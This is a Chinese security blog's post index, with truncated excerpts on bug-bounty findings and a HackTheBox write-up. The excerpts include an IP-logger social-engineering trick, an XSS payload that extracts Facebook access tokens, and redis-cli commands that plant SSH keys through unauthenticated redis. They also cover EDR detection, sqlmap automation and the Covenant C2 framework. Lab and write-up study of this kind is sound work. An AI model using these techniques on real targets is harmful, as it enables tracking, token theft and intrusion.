自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

test1988x的博客

  • 博客(10)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

原创 社工获取ip tips

IP logger网站1.点击这个2.他会创建一个新的地址3.把第一个第一个地址发送给其他人,我们在后台就可以看到ip记录了这里我用了代理Grabify网站

2020-01-14 16:46:37 3559 2

原创 src-tips(Facebook反射xss)

Payload:document.location.hash.split('access_token=')[1].split("&")[0]ordocument.location.hash.split('access_token=')[1].split("%25%32%35%25%33%32%25%33%36")[0]漏洞报告

2020-01-14 13:44:27 207

原创 src-tips(雅虎DoS)

在计算机网络中,速率限制用于控制网络接口控制器发送或接收的流量速率,并用于防止DoS攻击。速率限制用于控制去往或来自网络的传入和传出流量。例如,假设您使用的是特定服务的API,该API配置为允许每分钟100个请求。如果您提出的请求数量超出该限制,则会触发错误没有速率限制,这意味着没有机制可以防止您在短时间内提出的请求。假设您有一个忘记密码页面和一个受害人的电子邮件,现在输入受害人的电子邮件并使...

2020-01-14 13:36:02 189

原创 src-tips(Facebook电话号码泄露)

测试帐户收到了验证电话号码打开burp我可以在这些请求中看到我的电话号码facebook回应漏洞地址

2020-01-14 13:20:32 323

原创 Postman(HackTheBox)

本文参考:https://mp.weixin.qq.com/s/oMaEx6JDFC7hW5KfhVEGpw只为记录redis未授权ssh-keygen -t rsa -C "redis@fuck"cd .ssh/(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > ssh.txtredis-cli -h 10.10.10.160 ...

2020-01-10 11:42:29 852

原创 powershell杀软,EDR检测

地址:https://github.com/PwnDexter/Invoke-EDRCheckerpowershell导入模块PS C:\Users\Invoke-EDRChecker> Import-Module .\Invoke-EDRChecker.ps1PS C:\Users\Invoke-EDRChecker> Invoke-EDRChecker...

2020-01-09 20:12:55 698

原创 SleuthQL辅助sqlmap批量检测注入

项目地址:https://github.com/RhinoSecurityLabs/SleuthQL克隆到本地git clone https://github.com/RhinoSecurityLabs/SleuthQL.gitcd SleuthQLpip3 install -r requirements.txt0x01 导出burp日志保存0x02提取出urlpython...

2020-01-09 19:47:43 793 1

原创 Covenant初体验

0x00 简介Covenant是一个.NET开发的C2(command and control)框架,旨在突出.NET的攻击面,并充当红队成员的协作命令和控制平台。,使用.NET Core的开发环境,不仅支持Linux,MacOS和Windows,还支持docker容器。最特别的地方是支持动态编译,能够将输入的C#代码上传至C2 Server,获得编译后的文件并使用Assembly.Load()...

2020-01-02 14:05:21 818

原创 攻防世界-no-strings-attached

下载附件,查看下类型ELF文件,首先使用IDA打开康康这个authenticate();感觉有点搞头,点进去看看看这个decrypt有点问题这个就是解密的函数,我们使用gdb 动态调试一下b decrypt在decrypt这里下个断点介绍一下命令r就是让程序跑起来n就是运行到下一步由于这程序调用decrypt,我们看看他将结果传到的eax寄存器中查看下eax寄存器...

2020-01-01 11:58:02 2021

原创 kail2019新支持网卡

设备kail开箱即用需要驱动Injection2.4 GHz5 GHzAlfa AWUS052NHYNYYYPanda Wireless PAU09YNYYYAlfa AWUS036NEHYNYYNAlfa AWUS051NHYNYYYAlfa AWUS036HYNYYNAlfa AWUS1...

2020-01-01 11:42:18 1802

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除